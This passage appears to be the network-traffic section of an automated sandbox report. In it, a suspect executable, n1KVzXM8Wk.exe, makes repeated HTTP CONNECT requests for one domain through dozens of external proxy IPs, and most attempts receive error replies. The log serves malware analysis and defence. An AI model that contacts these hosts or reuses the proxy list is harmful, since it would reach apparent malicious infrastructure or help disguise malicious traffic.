                                                                                                      Feb 23, 2024 09:45:27.722297907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475125074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680782080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1462192.168.2.45412260.188.102.225180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.722300053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1463192.168.2.454114210.211.113.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.734359980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1464192.168.2.451337162.214.163.13770706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.734412909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.815191031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834742069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1465192.168.2.45421766.228.33.190484876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.734483957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178692102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680375099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.366003036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680593967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.975214005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.178575039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.578089952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.381932974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1466192.168.2.45382047.179.5.810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.740847111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1467192.168.2.45425743.153.36.484436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.741384029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1468192.168.2.45426043.153.36.484436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.743510008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1469192.168.2.45426543.153.36.484436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.745209932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1470192.168.2.45427043.153.36.484436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.746546984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1471192.168.2.45421294.23.222.122280796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.764385939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.365874052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866391897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.866054058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.865989923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.865964890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.881623030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1472192.168.2.454321202.159.60.1134436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.779589891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1473192.168.2.454323202.159.60.1134436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.781526089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1474192.168.2.454325202.159.60.1134436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.783543110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1475192.168.2.454329202.159.60.1134436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.784949064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1476192.168.2.453087194.233.78.142424206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.799388885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.815171957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834741116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834800005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.834336996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.834424019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.908205986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1477192.168.2.4513865.8.240.9041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.801639080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1478192.168.2.451417208.109.13.93343086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.806601048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.865804911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866183996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865932941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.881197929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1479192.168.2.45384674.208.177.198806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.806835890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.865761042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866194963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865931988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1480192.168.2.454022199.58.184.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.829142094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1481192.168.2.45419645.177.80.21010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.829377890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1482192.168.2.454222139.162.151.17690506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.829443932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1483192.168.2.4541698.222.145.238156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.833661079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1484192.168.2.454268172.67.181.103806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.833766937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.928962946 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1485192.168.2.45413951.68.164.77158106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.835385084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680289030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865910053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.975251913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.272166014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569123983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1486192.168.2.454273104.18.237.128806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.835752964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.936651945 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1487192.168.2.45436543.153.174.1064436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.852782011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1488192.168.2.454242144.217.180.23888886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.853693962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.963233948 CET255INHTTP/1.1 503 Service Unavailable
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Length: 88
                                                                                                      Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 6e 6f 20 73 75 63 68 20 68 6f 73 74 0a
                                                                                                      Data Ascii: dial tcp: lookup heygirlisheeverythingyouwantedinaman.com on 127.0.0.1:53: no such host


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1489192.168.2.45436743.153.174.1064436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.854104996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1490192.168.2.454176120.37.121.20990916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.857434034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.202406883 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:39 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1491192.168.2.453833139.162.181.177276606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.857609034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.865794897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866197109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.865957975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1492192.168.2.454232166.62.38.100393086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.869175911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333590984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.835079908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
